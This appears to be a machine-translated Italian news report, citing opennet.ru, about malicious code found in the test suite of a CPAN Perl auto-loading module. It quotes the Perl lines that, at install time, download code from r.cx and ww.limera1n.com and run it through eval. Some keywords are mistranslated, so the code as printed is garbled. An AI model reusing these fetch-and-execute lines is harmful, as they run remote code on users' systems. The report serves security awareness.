In un pacchetto Perl distribuito attraverso la directory CPAN , progettato per caricare automaticamente al volo i moduli CPAN, Codice malevolo. L'inserto dannoso era nel codice di prova , che spedisce dal 2011.
È interessante notare che sono sorte domande sul caricamento di codice discutibile nel 2016.
L'attività dannosa si riduce al tentativo di scaricare ed eseguire codice da un server di terze parti (http://r.cx:1/) durante l'esecuzione di una suite di test avviata durante l'installazione del modulo. Si presuppone che il codice inizialmente scaricato dal server esterno non fosse dannoso, ma ora la richiesta viene reindirizzata al dominio ww.limera1n.com, che fornisce la sua porzione di codice per l'esecuzione.
Per organizzare il download in un file Viene utilizzato il seguente codice:
mio $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
mio $prova = `$^X $prog`;
Il codice specificato provoca l'esecuzione dello script , il cui contenuto è ridotto alla riga:
usa lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Questo script viene caricato utilizzando il servizio codice dall'host esterno r.cx (i codici carattere 82.46.99.88 corrispondono al testo "R.cX") e lo esegue nel blocco eval.
$ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1″; stampa <$b>;'
eval scompatta u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Dopo il disimballaggio, viene infine eseguito quanto segue: :
print{$b=nuovo IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return avvisa$@ while$b;1
Il pacchetto problematico è stato ora rimosso dal repository. (Perl Authors Upload Server) e l'account dell'autore del modulo viene bloccato. In questo caso il modulo rimane comunque nell'archivio MetaCPAN e può essere installato direttamente da MetaCPAN utilizzando alcune utilità come cpanminus. che il pacchetto non è stato ampiamente distribuito.
Interessante discutere e l'autore del modulo, che ha smentito l'informazione secondo cui sarebbe stato inserito codice dannoso dopo che il suo sito "r.cx" è stato violato e ha spiegato che si stava solo divertendo e ha utilizzato perlobfuscator.com non per nascondere qualcosa, ma per ridurne le dimensioni del codice e semplificandone la copia tramite gli appunti. La scelta del nome della funzione “botstrap” si spiega con il fatto che questa parola “suona come bot ed è più breve di bootstrap”. L'autore del modulo ha inoltre assicurato che le manipolazioni identificate non eseguono azioni dannose, ma dimostrano solo il caricamento e l'esecuzione del codice tramite TCP.
Fonte: opennet.ru